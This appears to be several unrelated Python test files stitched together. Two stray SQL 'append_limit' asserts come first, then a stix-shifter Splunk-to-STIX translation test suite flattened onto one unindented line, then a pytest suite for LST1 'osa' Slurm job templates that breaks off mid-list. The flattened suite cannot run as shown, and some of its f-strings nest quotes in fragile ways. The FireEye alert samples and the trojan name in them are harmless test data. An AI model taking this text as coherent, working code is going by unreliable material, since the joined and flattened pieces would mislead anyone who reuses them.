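assert append_limit("select * from t", 100) == "select * from t limit 100;"
assert append_limit("select * from t limit 5", 100) == "select * from t limit 5;"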
import logging from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator from stix_shifter.stix_translation import stix_translation from stix_shifter_modules.splunk.entry_point import EntryPoint from stix2validator import validate_instance from stix_shifter_modules.splunk.stix_translation.splunk_utils import hash_type_lookup from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers MODULE = "splunk" logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger() entry_point = EntryPoint() map_data = entry_point.get_results_translator().map_data data_source = { "type": "identity", "id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3", "name": "Splunk", "identity_class": "events" } options = {} class TestTransform(object): @staticmethod def get_first(itr, constraint): return next( (obj for obj in itr if constraint(obj)), None ) @staticmethod def get_first_of_type(itr, typ): return TestTransform.get_first(itr, lambda o: type(o) == dict and o.get('type') == typ) def test_common_prop(self): data = {"_time": "2018-08-21T15:11:55.000+00:00", "event_count": 5} result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] result_bundle_identity = result_bundle_objects[0] assert(result_bundle_identity['type'] == data_source['type']) assert(result_bundle_identity['id'] == data_source['id']) assert(result_bundle_identity['name'] == data_source['name']) assert(result_bundle_identity['identity_class'] == data_source['identity_class']) observed_data = result_bundle_objects[1] assert(observed_data['id'] is not None) assert(observed_data['type'] == "observed-data") assert(observed_data['created_by_ref'] == result_bundle_identity['id']) assert(observed_data['number_observed'] == 5) assert(observed_data['created'] is not None) assert(observed_data['modified'] is not None) assert(observed_data['first_observed'] is not None) assert(observed_data['last_observed'] is not None) def test_change_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" file_bytes = "300" user = "ibm_user" objPath = "hkey_local_machine\\system\\bar\\foo" filePath = "C:\\Users\\someuser\\sample.dll" create_time = "2018-08-15T15:11:55.676+00:00" modify_time = "2018-08-15T18:10:30.456+00:00" file_hash = "41a26255d16d121dc525a6445144b895" file_name = "sample.dll" file_size = 25536 data = { "event_count": count, "_time": time, "user": user, "bytes": file_bytes, "object_path": objPath, "file_path": filePath, "file_create_time": create_time, "file_modify_time": modify_time, "file_hash": file_hash, "file_size": file_size, "file_name": file_name } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform wrk_obj = TestTransform.get_first_of_type(objects.values(), 'windows-registry-key') assert(wrk_obj is not None) assert(wrk_obj.keys() == {'type', 'key'}) assert(wrk_obj['key'] == "hkey_local_machine\\system\\bar\\foo") user_obj = 
TestTransform.get_first_of_type(objects.values(), 'user-account') assert(user_obj is not None), 'user-account object type not found' assert(user_obj.keys() == {'type', 'account_login', 'user_id'}) assert(user_obj['account_login'] == "ibm_user") assert(user_obj['user_id'] == "ibm_user") file_obj = TestTransform.get_first_of_type(objects.values(), 'file') assert(file_obj is not None), 'file object type not found' assert(file_obj.keys() == {'type', 'parent_directory_ref', 'created', 'modified', 'hashes', 'name', 'size'}) assert(file_obj['created'] == "2018-08-15T15:11:55.676Z") assert(file_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(file_obj['name'] == "sample.dll") assert(file_obj['size'] == 25536) assert (file_obj['hashes']['MD5'] == "41a26255d16d121dc525a6445144b895") dir_ref = file_obj['parent_directory_ref'] assert(dir_ref in objects), f"parent_directory_ref with key {file_obj['parent_directory_ref']} not found" dir_obj = objects[dir_ref] assert(dir_obj is not None), 'directory object type not found' assert(dir_obj.keys() == {'type', 'path', 'created', 'modified'}) assert(dir_obj['path'] == "C:\\Users\\someuser\\sample.dll") assert(dir_obj['created'] == "2018-08-15T15:11:55.676Z") assert(dir_obj['modified'] == "2018-08-15T18:10:30.456Z") print(objects.keys()) print(result_bundle_objects) assert(objects.keys() == set(map(str, range(0, 5)))) def test_certificate_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" serial = "1234" version = "1" sig_algorithm = "md5WithRSAEncryption" key_algorithm = "rsaEncryption" issuer = "C=US, ST=California, O=www.example.com, OU=new, CN=new" subject = "C=US, ST=Maryland, L=Baltimore, O=John Doe, OU=ExampleCorp, CN=www.example.com/emailAddress=doe@example.com" ssl_hash = "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f" data = { "event_count": count, "_time": time, "ssl_serial": serial, "ssl_version": version, "ssl_signature_algorithm": sig_algorithm, "ssl_issuer": issuer, "ssl_subject": subject, "ssl_hash": ssl_hash, "ssl_publickey_algorithm": key_algorithm } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform cert_obj = TestTransform.get_first_of_type(objects.values(), 'x509-certificate') assert(cert_obj is not None), 'x509-certificate object type not found' assert(cert_obj.keys() == {'type', 'serial_number', 'version', "signature_algorithm", "subject_public_key_algorithm", "issuer", "subject", "hashes"}) assert(cert_obj['serial_number'] == "1234") assert(cert_obj['version'] == "1") assert(cert_obj['signature_algorithm'] == "md5WithRSAEncryption") assert(cert_obj['issuer'] == "C=US, ST=California, O=www.example.com, OU=new, CN=new") assert(cert_obj['subject'] == "C=US, ST=Maryland, L=Baltimore, O=John Doe, OU=ExampleCorp, CN=www.example.com/emailAddress=doe@example.com") assert(cert_obj['subject_public_key_algorithm'] == "rsaEncryption") assert(cert_obj['hashes']['SHA-256'] == "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f") assert(objects.keys() == set(map(str, range(0, 1)))) def test_process_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" user
= "test_user" pid = 0 name = "test_process" filePath = "C:\\Users\\someuser\\sample.dll" create_time = "2018-08-15T15:11:55.676+00:00" modify_time = "2018-08-15T18:10:30.456+00:00" file_hash = "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f" file_name = "sample.dll" file_size = 25536 data = { "event_count": count, "_time": time, "user": user, "process_name": name, "process_id": pid, "file_path": filePath, "file_create_time": create_time, "file_modify_time": modify_time, "file_hash": file_hash, "file_size": file_size, "file_name": file_name } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform proc_obj = TestTransform.get_first_of_type(objects.values(), 'process') assert(proc_obj is not None), 'process object type not found' assert(proc_obj.keys() == {'type', 'name', 'pid', 'binary_ref'}) assert(proc_obj['name'] == "test_process") assert(proc_obj['pid'] == 0) user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert(user_obj is not None), 'user-account object type not found' assert(user_obj.keys() == {'type', 'account_login', 'user_id'}) assert(user_obj['account_login'] == "test_user") assert(user_obj['user_id'] == "test_user") bin_ref = proc_obj['binary_ref'] assert(bin_ref in objects), f"binary_ref with key {proc_obj["binary_ref"]} not found" file_obj = objects[bin_ref] assert(file_obj is not None), 'file object type not found' assert(file_obj.keys() == {'type', 'parent_directory_ref', 'created', 'modified', 'size', 'name', 'hashes'}) assert(file_obj['created'] == "2018-08-15T15:11:55.676Z") assert(file_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(file_obj['name'] == "sample.dll") assert(file_obj['size'] == 25536) assert (file_obj['hashes']['SHA-256'] == "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f") dir_ref = file_obj['parent_directory_ref'] assert(dir_ref in objects), f"parent_directory_ref with key {file_obj["parent_directory_ref"]} not found" dir_obj = objects[dir_ref] assert(dir_obj is not None), 'directory object type not found' assert(dir_obj.keys() == {'type', 'path', 'created', 'modified'}) assert(dir_obj['path'] == "C:\\Users\\someuser\\sample.dll") assert(dir_obj['created'] == "2018-08-15T15:11:55.676Z") assert(dir_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(objects.keys() == set(map(str, range(0, 4)))) def test_network_cim_to_stix(self): count = 2 time = "2018-08-21T15:11:55.000+00:00" user = "ibm_user" dest_ip = "127.0.0.1" dest_port = "8090" src_ip = "2001:0db8:85a3:0000:0000:8a2e:0370:7334" src_port = "8080" transport = "http" data = {"event_count": count, "_time": time, "user": user, "dest_ip": dest_ip, "dest_port": dest_port, "src_ip": src_ip, "src_port": src_port, "protocol": transport } print(data) result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) 
assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] nt_obj = TestTransform.get_first_of_type(objects.values(), 'network-traffic') assert(nt_obj is not None), 'network-traffic object type not found' assert(nt_obj.keys() == {'type', 'src_port', 'dst_port', 'src_ref', 'dst_ref', 'protocols'}) assert(nt_obj['src_port'] == 8080) assert(nt_obj['dst_port'] == 8090) assert(nt_obj['protocols'] == ['http']) ip_ref = nt_obj['dst_ref'] assert(ip_ref in objects), f"dst_ref with key {nt_obj["dst_ref"]} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == dest_ip) ip_ref = nt_obj['src_ref'] assert(ip_ref in objects), f"src_ref with key {nt_obj["src_ref"]} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value'}) assert(ip_obj['type'] == 'ipv6-addr') assert(ip_obj['value'] == src_ip) def test_email_cim_to_stix(self): count = 3 time = "2018-08-21T15:11:55.000+00:00" src_user = "Jane_Doe@ibm.com" subject = "Test Subject" multi = "False" data = {"event_count": count, "_time": time, "src_user": src_user, "subject": subject, "is_multipart": multi } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] msg_obj = TestTransform.get_first_of_type(objects.values(), 'email-message') assert(msg_obj is not None), 'email-message object type not found' assert(msg_obj.keys() == {'type', 'subject', 'sender_ref', 'from_ref', 'is_multipart'}) assert(msg_obj['subject'] == "Test Subject") assert(msg_obj['is_multipart'] == False) sender_ref = msg_obj['sender_ref'] assert(sender_ref in objects), f"sender_ref with key {msg_obj["sender_ref"]} not found" addr_obj = objects[sender_ref] assert(addr_obj.keys() == {'type', 'value'}) assert(addr_obj['type'] == 'email-addr') assert(addr_obj['value'] == src_user) from_ref = msg_obj['from_ref'] assert(sender_ref in objects), f"from_ref with key {msg_obj["from_ref"]} not found" addr_obj = objects[from_ref] assert(addr_obj.keys() == {'type', 'value'}) assert(addr_obj['type'] == 'email-addr') assert(addr_obj['value'] == src_user) def test_custom_mapping(self): data_source = "{\"type\": \"identity\", \"id\": \"identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3\", \"name\": \"Splunk\", \"identity_class\": \"events\"}" data = "[{\"tag\":\"network\", \"src_ip\": \"127.0.0.1\"}]" options = { "mapping": { "cim": { "to_stix": { "tag_to_model": { "network": [ "network-traffic", "dst_ip", "src_ip" ] }, "event_count": { "key": "number_observed", "cybox": False, "transformer": "ToInteger" }, "src_ip": [ { "key": "ipv4-addr.value", "object": "src_ip" }, { "key": "ipv6-addr.value", "object": "src_ip" }, { "key": "network-traffic.src_ref", "object": "network-traffic", "references": "src_ip" } ] } } } } translation = stix_translation.StixTranslation() result_bundle = translation.translate('splunk', 'results', data_source, data, options) result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] assert('objects' in observed_data) objects = observed_data['objects'] curr_obj = TestTransform.get_first_of_type(objects.values(), 'ipv4-addr') 
assert(curr_obj is not None), 'ipv4-addr object type not found' assert(curr_obj.keys() == {'type', 'value'}) assert(curr_obj['value'] == "127.0.0.1") def test_cim_to_stix_no_tags(self): data = {"src_ip": "169.250.0.1", "src_port": "1220", "src_mac": "aa:bb:cc:dd:11:22", "dest_ip": "127.0.0.1", "dest_port": "1120", "dest_mac": "ee:dd:bb:aa:cc:11", "file_hash": "cf23df2207d99a74fbe169e3eba035e633b65d94", "user": "sname", "url": "https://wally.fireeye.com/malware_analysis/analyses?maid=1", "protocol": "tcp", "_bkt": "main~44~6D3E49A0-31FE-44C3-8373-C3AC6B1ABF06", "_cd": "44:12606114", "_indextime": "1546960685", "_raw": "Jan 08 2019 15:18:04 192.168.33.131 fenotify-2.alert: CEF:0|FireEye|MAS|6.2.0.74298|MO|" "malware-object|4|rt=Jan 08 2019 15:18:04 Z src=169.250.0.1 dpt=1120 dst=127.0.0.1" " spt=1220 smac=AA:BB:CC:DD:11:22 dmac=EE:DD:BB:AA:CC:11 cn2Label=sid cn2=111" " fileHash=41a26255d16d121dc525a6445144b895 proto=tcp " "request=http://qa-server.eng.fireeye.com/QE/NotificationPcaps/" "58.253.68.29_80-192.168.85.128_1165-2119283109_T.exe cs3Label=osinfo" " cs3=Microsoft Windows7 Professional 6.1 sp1 dvchost=wally dvc=10.2.101.101 cn1Label=vlan" " cn1=0 externalId=1 cs4Label=link " "cs4=https://wally.fireeye.com/malware_analysis/analyses?maid=1 cs2Label=anomaly" " cs2=misc-anomaly cs1Label=sname cs1=FE_UPX;Trojan.PWS.OnlineGames", "_serial": "0", "_si": ["splunk3-01.internal.resilientsystems.com", "main"], "_sourcetype": "fe_cef_syslog", "_time": "2019-01-08T15:18:04.000+00:00", "event_count": 1 } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] # somehow breaking the stix validation # validated_result = validate_instance(observed_data) # assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] nt_obj = TestTransform.get_first_of_type(objects.values(), 'network-traffic') assert(nt_obj is not None), 'network-traffic object type not found' assert(nt_obj.keys() == {'type', 'src_ref', 'src_port', 'dst_ref', 'dst_port', 'protocols'}) assert(nt_obj['src_port'] == 1220) assert(nt_obj['dst_port'] == 1120) assert(nt_obj['protocols'] == ['tcp']) ip_ref = nt_obj['dst_ref'] assert(ip_ref in objects), "dst_ref with key {nt_obj['dst_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value', 'resolves_to_refs'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == '127.0.0.1') assert (isinstance(ip_obj['resolves_to_refs'], list) and isinstance(ip_obj['resolves_to_refs'][0], str)) ip_ref = nt_obj['src_ref'] assert(ip_ref in objects), "src_ref with key {nt_obj['src_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value', 'resolves_to_refs'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == '169.250.0.1') assert (isinstance(ip_obj['resolves_to_refs'], list) and isinstance(ip_obj['resolves_to_refs'][0], str)) file_obj = TestTransform.get_first_of_type(objects.values(), 'file') assert (file_obj is not None), 'file object type not found' assert (file_obj.keys() == {'type', 'hashes'}) assert (file_obj['hashes']['SHA-1'] == "cf23df2207d99a74fbe169e3eba035e633b65d94") user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert (user_obj is not None), 'user object type not found' assert (user_obj.keys() == {'type', 
'account_login', 'user_id'}) assert (user_obj['account_login'] == "sname") assert (user_obj['user_id'] == "sname") url_obj = TestTransform.get_first_of_type(objects.values(), 'url') assert (url_obj is not None), 'url object type not found' assert (url_obj.keys() == {'type', 'value'}) assert (url_obj['value'] == "https://wally.fireeye.com/malware_analysis/analyses?maid=1") domain_obj = TestTransform.get_first_of_type(objects.values(), 'domain-name') assert (domain_obj is not None), 'domain object type not found' assert (domain_obj.keys() == {'type', 'value'}) assert (domain_obj['value'] == "wally.fireeye.com") payload_obj = TestTransform.get_first_of_type(objects.values(), 'artifact') assert (payload_obj is not None), 'payload object type not found' assert (payload_obj.keys() == {'type', 'payload_bin'}) payload = 'SmFuIDA4IDIwMTkgMTU6MTg6MDQgMTkyLjE2OC4zMy4xMzEgZmVub3RpZnktMi5hbGVydDogQ0VGOjB8RmlyZUV5ZXxNQV' \ 'N8Ni4yLjAuNzQyOTh8TU98bWFsd2FyZS1vYmplY3R8NHxydD1KYW4gMDggMjAxOSAxNToxODowNCBaIHNyYz0xNjkuMjUw' \ 'LjAuMSBkcHQ9MTEyMCBkc3Q9MTI3LjAuMC4xIHNwdD0xMjIwIHNtYWM9QUE6QkI6Q0M6REQ6MTE6MjIgZG1hYz1FRTpERD' \ 'pCQjpBQTpDQzoxMSBjbjJMYWJlbD1zaWQgY24yPTExMSBmaWxlSGFzaD00MWEyNjI1NWQxNmQxMjFkYzUyNWE2NDQ1MTQ0' \ 'Yjg5NSBwcm90bz10Y3AgcmVxdWVzdD1odHRwOi8vcWEtc2VydmVyLmVuZy5maXJlZXllLmNvbS9RRS9Ob3RpZmljYXRpb2' \ '5QY2Fwcy81OC4yNTMuNjguMjlfODAtMTkyLjE2OC44NS4xMjhfMTE2NS0yMTE5MjgzMTA5X1QuZXhlIGNzM0xhYmVsPW9z' \ 'aW5mbyBjczM9TWljcm9zb2Z0IFdpbmRvd3M3IFByb2Zlc3Npb25hbCA2LjEgc3AxIGR2Y2hvc3Q9d2FsbHkgZHZjPTEwLj' \ 'IuMTAxLjEwMSBjbjFMYWJlbD12bGFuIGNuMT0wIGV4dGVybmFsSWQ9MSBjczRMYWJlbD1saW5rIGNzND1odHRwczovL3dh' \ 'bGx5LmZpcmVleWUuY29tL21hbHdhcmVfYW5hbHlzaXMvYW5hbHlzZXM/bWFpZD0xIGNzMkxhYmVsPWFub21hbHkgY3MyPW' \ '1pc2MtYW5vbWFseSBjczFMYWJlbD1zbmFtZSBjczE9RkVfVVBYO1Ryb2phbi5QV1MuT25saW5lR2FtZXM=' assert (payload_obj['payload_bin'] == payload)
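# A minimal sketch (hypothetical data, not drawn from the suite above) of the
# observed-data layout these tests traverse: `objects` is a dict keyed by
# stringified integers, and every `*_ref` property holds one of those keys,
# so a reference is valid only if it resolves to an entry in the same dict.
objects = {
    "0": {"type": "ipv4-addr", "value": "127.0.0.1"},
    "1": {"type": "network-traffic", "dst_ref": "0", "protocols": ["tcp"]},
}
nt = objects["1"]
assert nt["dst_ref"] in objects                      # a ref must resolve to a key
assert objects[nt["dst_ref"]]["type"] == "ipv4-addr"  # and to the expected object type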
import os
from pathlib import Path
from textwrap import dedent

import pytest

from osa.configs import options
from osa.configs.config import cfg

extra_files = Path(os.getenv("OSA_TEST_DATA", "extra"))
datasequence_history_file = extra_files / "history_files/sequence_LST1_04185.0010.history"
calibration_history_file = extra_files / "history_files/sequence_LST1_04183.history"
options.date = "2020-01-17"
options.tel_id = "LST1"
options.prod_id = "v0.1.0"


def test_historylevel():
    from osa.job import historylevel

    options.dl1_prod_id = "tailcut84"
    options.dl2_prod_id = "model1"
    level, rc = historylevel(datasequence_history_file, "DATA")
    assert level == 0
    assert rc == 0

    level, rc = historylevel(calibration_history_file, "PEDCALIB")
    assert level == 0
    assert rc == 0

    options.dl1_prod_id = "tailcut84"
    options.dl2_prod_id = "model2"
    level, rc = historylevel(datasequence_history_file, "DATA")
    assert level == 1
    assert rc == 0


def test_preparejobs(running_analysis_dir, sequence_list):
    from osa.job import prepare_jobs

    options.simulate = False
    options.directory = running_analysis_dir
    prepare_jobs(sequence_list)
    expected_calib_script = os.path.join(running_analysis_dir, "sequence_LST1_01809.py")
    expected_data_script = os.path.join(running_analysis_dir, "sequence_LST1_01807.py")
    assert os.path.isfile(os.path.abspath(expected_calib_script))
    assert os.path.isfile(os.path.abspath(expected_data_script))


def test_sequence_filenames(running_analysis_dir, sequence_list):
    from osa.job import sequence_filenames

    for sequence in sequence_list:
        sequence_filenames(sequence)
        assert sequence.script == running_analysis_dir / f"sequence_LST1_{sequence.run:05d}.py"


def test_scheduler_env_variables(sequence_list, running_analysis_dir):
    from osa.job import scheduler_env_variables

    # Extract the first sequence
    first_sequence = sequence_list[0]
    env_variables = scheduler_env_variables(first_sequence)
    assert env_variables == [
        '#SBATCH --job-name=LST1_01809',
        '#SBATCH --time=1:15:00',
        f'#SBATCH --chdir={running_analysis_dir}',
        '#SBATCH --output=log/Run01809.%4a_jobid_%A.out',
        '#SBATCH --error=log/Run01809.%4a_jobid_%A.err',
        # double-quoted cfg keys keep this f-string valid on Python < 3.12 as well
        f'#SBATCH --partition={cfg.get("SLURM", "PARTITION_PEDCALIB")}',
        '#SBATCH --mem-per-cpu=3GB',
    ]

    # Extract the second sequence
    second_sequence = sequence_list[1]
    env_variables = scheduler_env_variables(second_sequence)
    assert env_variables == [
        '#SBATCH --job-name=LST1_01807',
        '#SBATCH --time=1:15:00',
        f'#SBATCH --chdir={running_analysis_dir}',
        '#SBATCH --output=log/Run01807.%4a_jobid_%A.out',
        '#SBATCH --error=log/Run01807.%4a_jobid_%A.err',
        '#SBATCH --array=0-10',
        f'#SBATCH --partition={cfg.get("SLURM", "PARTITION_DATA")}',
        '#SBATCH --mem-per-cpu=16GB',
    ]


def test_job_header_template(sequence_list, running_analysis_dir):
    """Extract and check the header for the first two sequences."""
    from osa.job import job_header_template

    # Extract the first sequence
    first_sequence = sequence_list[0]
    header = job_header_template(first_sequence)
    output_string1 = dedent(
        f"""\
        #!/bin/env python
        #SBATCH --job-name=LST1_01809
        #SBATCH --time=1:15:00
        #SBATCH --chdir={running_analysis_dir}
        #SBATCH --output=log/Run01809.%4a_jobid_%A.out
        #SBATCH --error=log/Run01809.%4a_jobid_%A.err
        #SBATCH --partition={cfg.get('SLURM', 'PARTITION_PEDCALIB')}
        #SBATCH --mem-per-cpu=3GB"""
    )
    assert header == output_string1

    # Extract the second sequence
    second_sequence = sequence_list[1]
    header = job_header_template(second_sequence)
    output_string2 = dedent(
        f"""\
        #!/bin/env python
        #SBATCH --job-name=LST1_01807
        #SBATCH --time=1:15:00
        #SBATCH --chdir={running_analysis_dir}
        #SBATCH --output=log/Run01807.%4a_jobid_%A.out
        #SBATCH --error=log/Run01807.%4a_jobid_%A.err
        #SBATCH --array=0-10
        #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')}
        #SBATCH --mem-per-cpu=16GB"""
    )
    assert header == output_string2


def test_create_job_template_scheduler(
    sequence_list,
    drs4_time_calibration_files,
    drs4_baseline_file,
    calibration_file,
    run_summary_file,
    pedestal_ids_file,
):
    from osa.job import data_sequence_job_template

    assert pedestal_ids_file.exists()
    options.test = False
    options.simulate = False

    content1 = data_sequence_job_template(sequence_list[1])
    expected_content1 = dedent(
        f"""\
        #!/bin/env python
        #SBATCH --job-name=LST1_01807
        #SBATCH --time=1:15:00
        #SBATCH --chdir={Path.cwd()}/test_osa/test_files0/running_analysis/20200117/v0.1.0
        #SBATCH --output=log/Run01807.%4a_jobid_%A.out
        #SBATCH --error=log/Run01807.%4a_jobid_%A.err
        #SBATCH --array=0-10
        #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')}
        #SBATCH --mem-per-cpu={cfg.get('SLURM', 'MEMSIZE_DATA')}
        import os
        import subprocess
        import sys
        import tempfile
        os.environ['CTAPIPE_CACHE'] = '/fefs/aswg/lstanalyzer/.ctapipe/ctapipe_cache'
        os.environ['CTAPIPE_SVC_PATH'] = '/fefs/aswg/lstanalyzer/.ctapipe/service'
        os.environ['MPLCONFIGDIR'] = '/fefs/aswg/lstanalyzer/.cache/matplotlib'
        subruns = int(os.getenv('SLURM_ARRAY_TASK_ID'))
        with tempfile.TemporaryDirectory() as tmpdirname:
            os.environ['NUMBA_CACHE_DIR'] = tmpdirname
            proc = subprocess.run([
                'datasequence',
                '--config',
                '{Path.cwd()}/osa/configs/sequencer.cfg',
                '--date=2020-01-17',
                '--prod-id=v0.1.0',
                '--drs4-pedestal-file={drs4_baseline_file}',
                '--time-calib-file={drs4_time_calibration_files[0]}',
                '--pedcal-file={calibration_file}',
                '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5',
                '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt',
                '--run-summary={run_summary_file}',
                f'01807.{{subruns:04d}}',
                'LST1'
            ])
        sys.exit(proc.returncode)"""
    )

    content2 = data_sequence_job_template(sequence_list[2])
    expected_content2 = dedent(
        f"""\
        #!/bin/env python
        #SBATCH --job-name=LST1_01808
        #SBATCH --time=1:15:00
        #SBATCH --chdir={Path.cwd()}/test_osa/test_files0/running_analysis/20200117/v0.1.0
        #SBATCH --output=log/Run01808.%4a_jobid_%A.out
        #SBATCH --error=log/Run01808.%4a_jobid_%A.err
        #SBATCH --array=0-8
        #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')}
        #SBATCH --mem-per-cpu={cfg.get('SLURM', 'MEMSIZE_DATA')}
        import os
        import subprocess
        import sys
        import tempfile
        os.environ['CTAPIPE_CACHE'] = '/fefs/aswg/lstanalyzer/.ctapipe/ctapipe_cache'
        os.environ['CTAPIPE_SVC_PATH'] = '/fefs/aswg/lstanalyzer/.ctapipe/service'
        os.environ['MPLCONFIGDIR'] = '/fefs/aswg/lstanalyzer/.cache/matplotlib'
        subruns = int(os.getenv('SLURM_ARRAY_TASK_ID'))
        with tempfile.TemporaryDirectory() as tmpdirname:
            os.environ['NUMBA_CACHE_DIR'] = tmpdirname
            proc = subprocess.run([
                'datasequence',
                '--config',
                '{Path.cwd()}/osa/configs/sequencer.cfg',
                '--date=2020-01-17',
                '--prod-id=v0.1.0',
                '--drs4-pedestal-file={drs4_baseline_file}',
                '--time-calib-file={drs4_time_calibration_files[0]}',
                '--pedcal-file={calibration_file}',
                '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5',
                '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt',
                '--run-summary={run_summary_file}',
                f'--pedestal-ids-file={Path.cwd()}/test_osa/test_files0/auxiliary/PedestalFinder/20200117/pedestal_ids_Run01808.{{subruns:04d}}.h5',
                f'01808.{{subruns:04d}}',
                'LST1'
            ])
        sys.exit(proc.returncode)"""
    )

    options.simulate = True
    assert content1 == expected_content1
    assert content2 == expected_content2


def test_create_job_template_local(
    sequence_list,
    drs4_time_calibration_files,
    drs4_baseline_file,
    calibration_file,
    systematic_correction_files,
    run_summary_file,
    pedestal_ids_file,
    r0_data,
):
    """Check the job file in local mode (assuming no scheduler)."""
    from osa.job import data_sequence_job_template

    for file in drs4_time_calibration_files:
        assert file.exists()
    for file in systematic_correction_files:
        assert file.exists()
    for file in r0_data:
        assert file.exists()
    assert pedestal_ids_file.exists()

    options.test = True
    options.simulate = False

    content1 = data_sequence_job_template(sequence_list[1])
    expected_content1 = dedent(
        f"""\
        #!/bin/env python
        import os
        import subprocess
        import sys
        import tempfile
        subruns = 0
        with tempfile.TemporaryDirectory() as tmpdirname:
            os.environ['NUMBA_CACHE_DIR'] = tmpdirname
            proc = subprocess.run([
                'datasequence',
                '--config',
                '{Path.cwd()}/osa/configs/sequencer.cfg',
                '--date=2020-01-17',
                '--prod-id=v0.1.0',
                '--drs4-pedestal-file={drs4_baseline_file}',
                '--time-calib-file={drs4_time_calibration_files[0]}',
                '--pedcal-file={calibration_file}',
                '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5',
                '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt',
                '--run-summary={run_summary_file}',
                f'01807.{{subruns:04d}}',
                'LST1'
            ])
        sys.exit(proc.returncode)"""
    )

    content2 = data_sequence_job_template(sequence_list[2])
    expected_content2 = dedent(
        f"""\
        #!/bin/env python
        import os
        import subprocess
        import sys
        import tempfile
        subruns = 0
        with tempfile.TemporaryDirectory() as tmpdirname:
            os.environ['NUMBA_CACHE_DIR'] = tmpdirname
            proc = subprocess.run([
                'datasequence',
                '--config',
                '{Path.cwd()}/osa/configs/sequencer.cfg',
                '--date=2020-01-17',
                '--prod-id=v0.1.0',
                '--drs4-pedestal-file={drs4_baseline_file}',
                '--time-calib-file={drs4_time_calibration_files[0]}',
                '--pedcal-file={calibration_file}',
                '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5',
                '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt',
                '--run-summary={run_summary_file}',
                f'--pedestal-ids-file={Path.cwd()}/test_osa/test_files0/auxiliary/PedestalFinder/20200117/pedestal_ids_Run01808.{{subruns:04d}}.h5',
